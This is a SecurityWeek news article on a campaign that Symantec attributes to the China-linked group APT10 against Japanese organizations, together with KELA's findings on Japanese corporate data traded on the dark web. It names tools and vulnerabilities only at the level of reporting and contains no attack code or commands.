Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cyberwarfare

Chinese Hackers Target Japanese Organizations in Large-Scale Campaign

China-linked threat actor APT10 was observed launching a large-scale campaign against Japanese organizations and their subsidiaries.

China-linked threat actor APT10 was observed launching a large-scale campaign against Japanese organizations and their subsidiaries.

Also referred to as Cicada, Stone Panda, and Cloud Hopper, APT10 is known for launching espionage campaigns for over a decade, including attacks aimed at managed service providers (MSPs) and Japan-linked organizations.

As part of the newly observed campaign, the hacking group has been using a combination of living-off-the-land tools and custom malware, including Backdoor.Hartip, which appears to be a new addition to its arsenal.

During the attacks, the adversary managed to compromise domain controllers and file servers, and the security researchers discovered evidence that data was exfiltrated from some of the infected systems, Symantec, a division of Broadcom, reports.

One of the main characteristics of this attack was the extensive use of DLL side-loading, with recent incidents showing the adoption of an exploit for the Zerologon vulnerability that Microsoft patched in August.

The attacks likely started in mid-October 2019 and continued at least up to the beginning of October 2020. In some cases, the attackers managed to maintain a foothold in the compromised networks for nearly one year.

Victims were mainly large, well-known organizations, many of them headquartered in Japan or with links to Japan. The attacks mainly focused on South and East Asia, with one victim being a Chinese subsidiary of a Japanese organization, an atypical target for a state-sponsored Chinese group.

Targeted sectors include automotive (including suppliers of parts for the motor industry), clothing, conglomerates, engineering, electronics, government, general trading, industrial products, manufacturing, MSPs, pharmaceutical, and professional services.

Advertisement. Scroll to continue reading.

Although the attackers spent a significant amount of time in the networks of some victims, they left after days from other networks. In some cases, the attackers ceased the activity on a network after a short period of time, but returned months later.

As part of the attacks, the hackers used living-off-the-land, dual-use, and publicly available tools and techniques for network reconnaissance, credential theft, file archiving, and more, including Certutil, Adfind, Csvde, Ntdsutil, WMIExec, and PowerShell.

“The scale and sophistication of this attack campaign indicate that it is the work of a large and well-resourced group, such as a nation-state actor, with Symantec discovering enough evidence to attribute it with medium confidence to Cicada,” Symantec notes.

In a separate report published this week, KELA threat intelligence analyst Victoria Kivilevich explained that data belonging to Japanese corporations (government and educational entities included), is being traded on the Dark Web. Such data includes stolen credentials that provide adversaries with initial access to internal networks. Over 100 million exposed Japanese emails were identified.

Between June and October 2020, KELA observed 11 attacks on Japanese organizations, all carrying ransomware, with manufacturing, construction, and government sectors being affected. While the compromise vector is not certain in all cases, the CVE-2019-11510 Pulse Secure flaw was targeted in at least one incident.

“Among the most prominent threats on the darknet, KELA observed leaks and sales of Japanese entities’ data. While many offers are related to regular users, some actors are specifically looking for corporate data of Japanese organizations,” KELA notes.

Related: Chinese APT Uses DLL Side-Loading in Attacks on Myanmar

Related: Hacker Group Targeted U.S. Utilities in Two Parallel Campaigns

Related: New APT10 Activity Detected in Southeast Asia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cyberwarfare

WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...

Cyberwarfare

Russian espionage group Nomadic Octopus infiltrated a Tajikistani telecoms provider to spy on 18 entities, including government officials and public service infrastructures.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Cyberwarfare

Several hacker groups have joined in on the Israel-Hamas war that started over the weekend after the militant group launched a major attack.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...